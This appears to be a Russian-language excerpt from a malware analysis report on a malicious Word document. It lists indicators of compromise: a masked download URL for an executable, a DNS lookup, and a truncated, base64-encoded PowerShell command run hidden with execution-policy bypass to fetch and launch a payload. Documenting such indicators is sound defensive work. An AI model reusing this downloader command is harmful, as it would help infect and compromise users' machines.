Техническая информация
- http://al###ood.com/lumia.exe как $dpl
- '<SYSTEM32>\cmd.exe' /c powershell.exe -ep bypass -noni -w hidden -Enc KAAkAGQAcABsAD0AJABlAG4AdgA6AHQAZQBtAHAAKwAnAGYALgBlAHgAZQAnACkAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGk...
- <Текущая директория>\~wrd0000.tmp
- <PATH_SAMPLE>.doc
- http://al###ood.com/lumia.exe
- DNS ASK al###ood.com
- '<SYSTEM32>\cmd.exe' /c powershell.exe -ep bypass -noni -w hidden -Enc KAAkAGQAcABsAD0AJABlAG4AdgA6AHQAZQBtAHAAKwAnAGYALgBlAHgAZQAnACkAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGk...' (со скрытым окном)